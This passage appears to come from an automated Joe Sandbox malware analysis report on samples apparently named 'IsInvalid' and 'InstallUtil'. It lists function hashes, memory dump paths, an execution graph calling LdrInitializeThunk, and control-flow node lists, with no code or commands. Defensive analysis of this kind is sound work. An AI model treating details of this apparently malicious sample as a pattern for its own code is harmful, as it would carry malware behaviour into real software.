                                                                      • Opcode Fuzzy Hash: 2680e189e14853d5aa57f9071e7ef2c826dc603ff7a5eb2d4e39f1c096914068
                                                                      • Instruction Fuzzy Hash: 0A1192B8A14119DFCB24DF28D994ADABBB6FB48314F2041DAD419A7788EB305E85CF50
                                                                      Function 01409BF0 Relevance: .0, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 710ac6fef1f5623a296a74831e8b1506b5a7960bddd561bfa3fa4ea2ae76b80c
                                                                      • Instruction ID: 5f51e3a6b6225c4068a498245b1fdebbb894e1bacd2186fbcde10988795adf5d
                                                                      • Opcode Fuzzy Hash: 710ac6fef1f5623a296a74831e8b1506b5a7960bddd561bfa3fa4ea2ae76b80c
                                                                      • Instruction Fuzzy Hash: 36119074805228CFDB62CF29C958A88BBB5BB49304F1081EAD509A72A2DB759FC1CF40
                                                                      Function 01400978 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8267d915b996185dfd5587305f5028a8bb66964a093d76cd4974681d319293ac
                                                                      • Instruction ID: f60e835dcf7c63accfa44f0d8c748aab8e704628e13e402ff5d958c4d2891ef5
                                                                      • Opcode Fuzzy Hash: 8267d915b996185dfd5587305f5028a8bb66964a093d76cd4974681d319293ac
                                                                      • Instruction Fuzzy Hash: 55F08270818388FFCB82DBB899104ACBFB0EF4B244B2445EAD485D7266D6311E49D751
                                                                      Function 0140E398 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77370c3f8a560bb73388faf0d873dcd3a1065d8c667533c65010fee0464fffc6
                                                                      • Instruction ID: 22329eb9d8e635ef262237faa32724ea0fac5ab86a831fdc7fc0f0a1c4adcec8
                                                                      • Opcode Fuzzy Hash: 77370c3f8a560bb73388faf0d873dcd3a1065d8c667533c65010fee0464fffc6
                                                                      • Instruction Fuzzy Hash: A3F0A574E05208EFCB85DFA9D841A9DFFB5EB48310F10C5AAAD19A3390D6329A51DF40
                                                                      Function 074BA990 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 039ed929ae14e6fca8cdef12abdbab13f1f653327d46a9b284f8125c57b387bf
                                                                      • Instruction ID: 8ba37ce2f4101e9006bbec8de22a03d02a404f64efd50b2a0b393be32e840cbd
                                                                      • Opcode Fuzzy Hash: 039ed929ae14e6fca8cdef12abdbab13f1f653327d46a9b284f8125c57b387bf
                                                                      • Instruction Fuzzy Hash: D4E0A5B4E05208AFCB94DFA8D84069DBBB4EB49310F10C4AA981893340D6319E56DF51
                                                                      Function 074BD990 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 039ed929ae14e6fca8cdef12abdbab13f1f653327d46a9b284f8125c57b387bf
                                                                      • Instruction ID: a1104e5fb1d4a23d0695c6279b19a1bd6e9af0be8fbb144247b15824f931c271
                                                                      • Opcode Fuzzy Hash: 039ed929ae14e6fca8cdef12abdbab13f1f653327d46a9b284f8125c57b387bf
                                                                      • Instruction Fuzzy Hash: ABE0A5B4E05208AFCB94DFA8D44069DBBB4EB49310F10C0AAA81893340D6319A52DF51
                                                                      Function 074B60A0 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 039ed929ae14e6fca8cdef12abdbab13f1f653327d46a9b284f8125c57b387bf
                                                                      • Instruction ID: a2bc34f07f066bd4090db82bf25d775d35d132557c277d99ff3c58c6d27541d2
                                                                      • Opcode Fuzzy Hash: 039ed929ae14e6fca8cdef12abdbab13f1f653327d46a9b284f8125c57b387bf
                                                                      • Instruction Fuzzy Hash: 7BE0C9B4E05208EFCB94DFA9D4406DDFBF4EB49310F10C0AA981893341D6319E51DF51
                                                                      Function 074BA778 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c298f6ca92a9a50aecc8b0f9e1e1c65fb938bfaf5ce807784f41940af3ab97dd
                                                                      • Instruction ID: bb6563d5abeb3d66f65bfd3ab73375eef163ab7458ddcbb87596a1fde255b861
                                                                      • Opcode Fuzzy Hash: c298f6ca92a9a50aecc8b0f9e1e1c65fb938bfaf5ce807784f41940af3ab97dd
                                                                      • Instruction Fuzzy Hash: 6DE0C2B4E09208AFCB94DFA8D8406ACBBF4EB89210F10C4AA981893340D6319A42CF40
                                                                      Function 074BA630 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c298f6ca92a9a50aecc8b0f9e1e1c65fb938bfaf5ce807784f41940af3ab97dd
                                                                      • Instruction ID: 2328e2293f5e054fb9f240ab64b75e2ad0d187fe38f932f5834afc0a1f40cdea
                                                                      • Opcode Fuzzy Hash: c298f6ca92a9a50aecc8b0f9e1e1c65fb938bfaf5ce807784f41940af3ab97dd
                                                                      • Instruction Fuzzy Hash: B7E0E5B4E05208EFCB94DFA8D4416ECFBF4EB49310F10C0AA986893340EA319E42CF40
                                                                      Function 074BF6D0 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c298f6ca92a9a50aecc8b0f9e1e1c65fb938bfaf5ce807784f41940af3ab97dd
                                                                      • Instruction ID: 137533643208f07d2e03518b933bb643cb94bdce38da1ff37e84b6d29975e3a2
                                                                      • Opcode Fuzzy Hash: c298f6ca92a9a50aecc8b0f9e1e1c65fb938bfaf5ce807784f41940af3ab97dd
                                                                      • Instruction Fuzzy Hash: B8E0E5B4E05208EFCB94DFA9D8406ECFBF4EB49310F10C4AA981893350DA319E46CF40
                                                                      Function 01400988 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f84686ace58e09a7d98d6246f5b25dad99d78213d855007db14aba62408eb0d
                                                                      • Instruction ID: 9709be5ab94be44713f856fe3bcfcb02e8cf525fe1a7fa641478b113495e0220
                                                                      • Opcode Fuzzy Hash: 5f84686ace58e09a7d98d6246f5b25dad99d78213d855007db14aba62408eb0d
                                                                      • Instruction Fuzzy Hash: BCE01A34D0420DFF8B84EFB8E54559CBBF1EB89240F6085BAD849A3354EB306F459B91
                                                                      Function 0140EBC0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a95647ba12110567439d48868e30359f12a21a8ec2942e9b8c969d66affdb03f
                                                                      • Instruction ID: 65b4f1537632e385b37ff5798bc3cac2f283e34a3fe4faf4bb18d20cb9f3d424
                                                                      • Opcode Fuzzy Hash: a95647ba12110567439d48868e30359f12a21a8ec2942e9b8c969d66affdb03f
                                                                      • Instruction Fuzzy Hash: FDE0867490910CEBC704DFA9D8409ADFFB8AB49310F10C1BAE85567391D6319B52DBA0
                                                                      Function 074B8E40 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3785bea68d9de6828eebb0387363d5f8d9223aa097643302115d34c419032f31
                                                                      • Instruction ID: 9d0c6eb638e3d208f4397f8767c192bd4a86375b6b59555554e86f0d5f7f03f0
                                                                      • Opcode Fuzzy Hash: 3785bea68d9de6828eebb0387363d5f8d9223aa097643302115d34c419032f31
                                                                      • Instruction Fuzzy Hash: BEE01A74D05108EBCB54DBE8D4406ECFBB8AB49310F10C4AAD82893341D6355E42DF90
                                                                      Function 074A4425 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b69a04750e3323456a8a74976e00112a17ae39ddd9921bd228cbca12057500d0
                                                                      • Instruction ID: 59c660bfff60c16b967c9df1925407e73d7c324b076b942d9bdf8de7bb7bdaf6
                                                                      • Opcode Fuzzy Hash: b69a04750e3323456a8a74976e00112a17ae39ddd9921bd228cbca12057500d0
                                                                      • Instruction Fuzzy Hash: 8BF06778E14329CFCB64DF18D994A99BBB1EF49314F1044DA9429A3745EB305EC1DF11
                                                                      Function 0140D338 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 259942c58e739c2c644a5e49b07363f2d505189ef027d2c1d745b9cb56b16af6
                                                                      • Instruction ID: 79f7fde5371f8d03e0a7b6b8d231d6273fd92904c4acf5ebe4b6e1a7ee654302
                                                                      • Opcode Fuzzy Hash: 259942c58e739c2c644a5e49b07363f2d505189ef027d2c1d745b9cb56b16af6
                                                                      • Instruction Fuzzy Hash: B6E0C231901208DFCB80EFF5D90468EBFF9DB4A301F0050A6D10593250EE365A00DB91
                                                                      Function 074BBF80 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d993e89bab9c13c22dab1c79c1aa58ebc3dc1c3650f28bfae5f8f5c536f09c8f
                                                                      • Instruction ID: ee7d2fa8a2b6720a797505aeba5aec9e2dce874b725231848a7ea51a81db3664
                                                                      • Opcode Fuzzy Hash: d993e89bab9c13c22dab1c79c1aa58ebc3dc1c3650f28bfae5f8f5c536f09c8f
                                                                      • Instruction Fuzzy Hash: 5BE0ECB4915208DFC754DFB8D5456DDBBB8EB09215F2041AAD848D3340E6706A40DF51
                                                                      Function 074BB918 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08fe3ac730a8c3969f57d6e86f254ebe1944b7e2921500df60988014c1734250
                                                                      • Instruction ID: 10f4015b19e4cba0165df44aaaa1749517ae1bfbe05768e8f9c1e6e0ccf79ada
                                                                      • Opcode Fuzzy Hash: 08fe3ac730a8c3969f57d6e86f254ebe1944b7e2921500df60988014c1734250
                                                                      • Instruction Fuzzy Hash: 14E0C2B194120C9BCB80EFF9A80069E7BECDB05200F0044B6D90593250EE324A009BA1
                                                                      Function 074BE528 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9982c232ec25a45368f2e7f96a3dfe37f8b1261d7a1e406108b6aefa13f2c9ed
                                                                      • Instruction ID: f40738f0472d9c7bdbf4a1d5fa09006f40b04b8f010fe6f0421ff8836e824025
                                                                      • Opcode Fuzzy Hash: 9982c232ec25a45368f2e7f96a3dfe37f8b1261d7a1e406108b6aefa13f2c9ed
                                                                      • Instruction Fuzzy Hash: E7E0C2B4909118DBC714DFE8E8815ECFBB8EB86310F14C0EED80813344DA329E42CB90
                                                                      Function 074BE920 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea7e9c40615c633ecfb902de0cfc824ff244ff46474dd15a545f0435e394a094
                                                                      • Instruction ID: 81924f6d13090362234df4a64c5285a87b4388f1aeb38517764296f109eb9d6a
                                                                      • Opcode Fuzzy Hash: ea7e9c40615c633ecfb902de0cfc824ff244ff46474dd15a545f0435e394a094
                                                                      • Instruction Fuzzy Hash: 97C02BB104F30987C1B423B5F40C3F5B6DC874B321F806812E10D008B14A7009C4CB61
                                                                      Function 0140D0F8 Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e3e766f076a20f1b0266fc7c65a332038b20cae56f5777c809ba81410acfcff7
                                                                      • Instruction ID: 431fc2b39e934a8748e264197a0229bef0e024e871a6db68770402a159456ce4
                                                                      • Opcode Fuzzy Hash: e3e766f076a20f1b0266fc7c65a332038b20cae56f5777c809ba81410acfcff7
                                                                      • Instruction Fuzzy Hash: F7C08C305452048BC3947BE9BC2D3287FA86B01626F480031E32E14DA1EFB00048CF2A
                                                                      Function 074A6A8F Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: becfe238f75db8d05554ff834a941b9dfe1cc936d9a3d98020b9a7ff9baf7d79
                                                                      • Instruction ID: 457e3e21703480aa6f78df384e6a5a9837c54bde8386594169fa161f78f0f9a4
                                                                      • Opcode Fuzzy Hash: becfe238f75db8d05554ff834a941b9dfe1cc936d9a3d98020b9a7ff9baf7d79
                                                                      • Instruction Fuzzy Hash: BED0A97424800ECBDB18DA24C518BDA36A6FB49308F004044802E9368AEB300884CB62
                                                                      Function 01400D24 Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df740ae6831cb1c9ae34814e35f650076457aa1ad21af773fa575dd3e991f960
                                                                      • Instruction ID: 673ffbacd73c1f53bc0403c4f6367d2ce80a6c48a7392b0c97b6c7560c0fc5e1
                                                                      • Opcode Fuzzy Hash: df740ae6831cb1c9ae34814e35f650076457aa1ad21af773fa575dd3e991f960
                                                                      • Instruction Fuzzy Hash: 08C04C60819F15C7971A5FE7800477D357199092EC7404AB7F073531F1DA7056438A77
                                                                      Function 01400853 Relevance: .0, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80e2570f7188b7e1a8baf92281216a40bb0886ad77b6b1d9f711af3e74441312
                                                                      • Instruction ID: 57f1942562dbaa8f9a4fca2a2d92be47cdbfc92622d8a60fb85fdb780c59b8a9
                                                                      • Opcode Fuzzy Hash: 80e2570f7188b7e1a8baf92281216a40bb0886ad77b6b1d9f711af3e74441312
                                                                      • Instruction Fuzzy Hash:

                                                                      Execution Graph

                                                                      Execution Coverage:17.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:10.5%
                                                                      Total number of Nodes:38
                                                                      Total number of Limit Nodes:6
                                                                      execution_graph 19196 4b18460 19197 4b18467 19196->19197 19199 4b1846d 19196->19199 19197->19199 19201 4b187ee 19197->19201 19202 4b17b70 19197->19202 19200 4b17b70 LdrInitializeThunk 19200->19201 19201->19199 19201->19200 19203 4b17b82 19202->19203 19205 4b17b87 19202->19205 19203->19201 19204 4b182b1 LdrInitializeThunk 19204->19203 19205->19203 19205->19204 19206 22aced8 19207 22acee4 19206->19207 19211 4b111b0 19207->19211 19218 4b111c0 19207->19218 19208 22acf98 19212 4b111c0 19211->19212 19213 4b112ae 19212->19213 19215 4b17b70 LdrInitializeThunk 19212->19215 19225 4b17b60 19212->19225 19231 4b17d90 19212->19231 19237 4b18174 19212->19237 19213->19208 19215->19213 19219 4b111e2 19218->19219 19220 4b112ae 19219->19220 19221 4b17d90 2 API calls 19219->19221 19222 4b17b70 LdrInitializeThunk 19219->19222 19223 4b17b60 2 API calls 19219->19223 19224 4b18174 2 API calls 19219->19224 19220->19208 19221->19220 19222->19220 19223->19220 19224->19220 19226 4b17b82 19225->19226 19230 4b17b87 19225->19230 19226->19213 19227 4b1816c LdrInitializeThunk 19227->19226 19229 4b17b70 LdrInitializeThunk 19229->19230 19230->19226 19230->19227 19230->19229 19233 4b17dc1 19231->19233 19232 4b17f21 19232->19213 19233->19232 19234 4b1816c LdrInitializeThunk 19233->19234 19236 4b17b70 LdrInitializeThunk 19233->19236 19234->19232 19236->19233 19238 4b1802b 19237->19238 19240 4b1816c LdrInitializeThunk 19238->19240 19242 4b17b70 LdrInitializeThunk 19238->19242 19241 4b182c9 19240->19241 19241->19213 19242->19238

                                                                      Executed Functions

                                                                      Function 022A6730 Relevance: 6.7, Strings: 5, Instructions: 444COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 146 22a6730-22a6766 147 22a676e-22a6774 146->147 274 22a6768 call 22a6108 146->274 275 22a6768 call 22a6730 146->275 276 22a6768 call 22a6880 146->276 148 22a6776-22a677a 147->148 149 22a67c4-22a67c8 147->149 152 22a6789-22a6790 148->152 153 22a677c-22a6781 148->153 150 22a67ca-22a67d9 149->150 151 22a67df-22a67f3 149->151 154 22a67db-22a67dd 150->154 155 22a6805-22a680f 150->155 156 22a67fb-22a6802 151->156 270 22a67f5 call 22a9848 151->270 271 22a67f5 call 22a9530 151->271 272 22a67f5 call 22a9540 151->272 157 22a6866-22a68a3 152->157 158 22a6796-22a679d 152->158 153->152 154->156 159 22a6819-22a681d 155->159 160 22a6811-22a6817 155->160 167 22a68ae-22a68ce 157->167 168 22a68a5-22a68ab 157->168 158->149 161 22a679f-22a67a3 158->161 162 22a6825-22a685f 159->162 166 22a681f 159->166 160->162 164 22a67b2-22a67b9 161->164 165 22a67a5-22a67aa 161->165 162->157 164->157 169 22a67bf-22a67c2 164->169 165->164 166->162 174 22a68d0 167->174 175 22a68d5-22a68dc 167->175 168->167 169->156 177 22a6c64-22a6c6d 174->177 178 22a68de-22a68e9 175->178 179 22a68ef-22a6902 178->179 180 22a6c75-22a6c82 178->180 185 22a6918-22a6933 179->185 186 22a6904-22a6912 179->186 190 22a6957-22a695a 185->190 191 22a6935-22a693b 185->191 186->185 189 22a6bec-22a6bf3 186->189 189->177 194 22a6bf5-22a6bf7 189->194 195 22a6960-22a6963 190->195 196 22a6ab4-22a6aba 190->196 192 22a693d 191->192 193 22a6944-22a6947 191->193 192->193 192->196 197 22a697a-22a6980 192->197 198 22a6ba6-22a6ba9 192->198 193->197 199 22a6949-22a694c 193->199 200 22a6bf9-22a6bfe 194->200 201 22a6c06-22a6c0c 194->201 195->196 203 22a6969-22a696f 195->203 196->198 202 22a6ac0-22a6ac5 196->202 208 22a6982-22a6984 197->208 209 22a6986-22a6988 197->209 210 22a6baf-22a6bb5 198->210 211 22a6c70 198->211 204 22a6952 199->204 205 22a69e6-22a69ec 199->205 200->201 201->180 206 22a6c0e-22a6c13 201->206 202->198 203->196 207 22a6975 203->207 204->198 205->198 214 22a69f2-22a69f8 205->214 212 22a6c58-22a6c5b 206->212 213 22a6c15-22a6c1a 206->213 207->198 215 22a6992-22a699b 208->215 209->215 216 22a6bda-22a6bde 210->216 217 22a6bb7-22a6bbf 210->217 211->180 212->211 221 22a6c5d-22a6c62 212->221 213->211 222 22a6c1c 213->222 223 22a69fa-22a69fc 214->223 224 22a69fe-22a6a00 214->224 218 22a69ae-22a69d6 215->218 219 22a699d-22a69a8 215->219 216->189 220 22a6be0-22a6be6 216->220 217->180 225 22a6bc5-22a6bd4 217->225 245 22a6aca-22a6b00 218->245 246 22a69dc-22a69e1 218->246 219->198 219->218 220->178 220->189 221->177 221->194 226 22a6c23-22a6c28 222->226 227 22a6a0a-22a6a21 223->227 224->227 225->185 225->216 231 22a6c4a-22a6c4c 226->231 232 22a6c2a-22a6c2c 226->232 238 22a6a4c-22a6a73 227->238 239 22a6a23-22a6a3c 227->239 231->211 234 22a6c4e-22a6c51 231->234 235 22a6c3b-22a6c41 232->235 236 22a6c2e-22a6c33 232->236 234->212 235->180 237 22a6c43-22a6c48 235->237 236->235 237->231 241 22a6c1e-22a6c21 237->241 238->211 251 22a6a79-22a6a7c 238->251 239->245 249 22a6a42-22a6a47 239->249 241->211 241->226 253 22a6b0d-22a6b15 245->253 254 22a6b02-22a6b06 245->254 246->245 249->245 251->211 252 22a6a82-22a6aab 251->252 252->245 269 22a6aad-22a6ab2 252->269 253->211 255 22a6b1b-22a6b20 253->255 256 22a6b08-22a6b0b 254->256 257 22a6b25-22a6b29 254->257 255->198 256->253 256->257 259 22a6b2b-22a6b31 257->259 260 22a6b48-22a6b4c 257->260 259->260 261 22a6b33-22a6b3b 259->261 262 22a6b4e-22a6b54 260->262 263 22a6b56-22a6b75 call 22a6e58 260->263 261->211 265 22a6b41-22a6b46 261->265 262->263 266 22a6b7b-22a6b7f 262->266 263->266 265->198 266->198 267 22a6b81-22a6b9d 266->267 267->198 269->245 270->156 271->156 272->156 274->147 275->147 276->147
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                      • API String ID: 0-2525668591
                                                                      • Opcode ID: 68fee85356926a0447ffcd3bfa16552a25bbd38097c1c7a55da3c62240d7830a
                                                                      • Instruction ID: f05aa66327ac388ed9a624f69cb18d3482626faf1c83eb69a81c345ad1d3e94f
                                                                      • Opcode Fuzzy Hash: 68fee85356926a0447ffcd3bfa16552a25bbd38097c1c7a55da3c62240d7830a
                                                                      • Instruction Fuzzy Hash: B7025D70A1021ADFCF14CFA8C998ABDBBBAFF48304F188469E415AB669D730DD45CB50
                                                                      Function 022A9540 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-183542557
                                                                      • Opcode ID: c47c8161ce5ea63742cd901f62b7e5e65bcad23dc217ba15ad7be1da58cf07d1
                                                                      • Instruction ID: 819ac34e2e72d2191ee09be5b64a20ad0f7a0996e0253c20f5e6d8b4037ea9b1
                                                                      • Opcode Fuzzy Hash: c47c8161ce5ea63742cd901f62b7e5e65bcad23dc217ba15ad7be1da58cf07d1
                                                                      • Instruction Fuzzy Hash: 99A2C470A1020ADFCB15CFA9C994AAEBBF2FF88304F148569E405DB769D731E985CB50
                                                                      Function 022A6108 Relevance: 3.0, Strings: 2, Instructions: 511COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
